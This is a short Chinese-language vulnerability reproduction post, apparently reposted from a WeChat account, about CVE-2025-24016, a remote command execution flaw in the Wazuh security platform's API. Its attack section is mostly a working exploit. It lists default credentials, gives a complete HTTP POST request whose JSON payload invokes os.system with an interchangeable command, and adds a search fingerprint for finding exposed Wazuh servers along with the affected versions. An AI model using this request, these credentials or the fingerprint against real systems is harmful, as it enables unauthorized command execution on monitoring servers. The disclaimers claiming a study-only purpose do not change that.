系统介绍
Wazuh是一个开源的安全监控平台,其核心是轻量级的端点代理,可部署在需要监控的系统上实时收集关键安全数据,并传输到中央管理服务器。该服务器具备深入的分析能力,能通过规则引擎识别潜在安全威胁和异常行为,还可与Elastic Stack无缝集成,提供强大的搜索和数据可视化功能,可用于入侵检测、日志数据分析、文件完整性监控、漏洞检测等多种安全监控场景。
漏洞复现
1、Authorization账号密码可能为弱口令
wazuh:wazuhadmin:adminwazuh-wui:MyS3cr37P450rwazuh-wui:MyS3cr37P450r.*-
2、替换需要执行的命令内容
POST /security/user/authenticate/run_as HTTP/1.1Host: *.*.*。*:55000Authorization: Basic {{base64enc(wazuh:wazuh)}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36Content-Type: application/json{"__unhandled_exc__":{"__class__":"os.system","__args__":["ping *.*.*.*"]}
搜索指纹
title="Wazuh"
利用条件
4.4.0 <= Wazuh < 4.9.1
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。
原文始发于微信公众号(巨黑科):Wazuh安全监控平台 任意命令执行漏洞 CVE-2025-24016
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论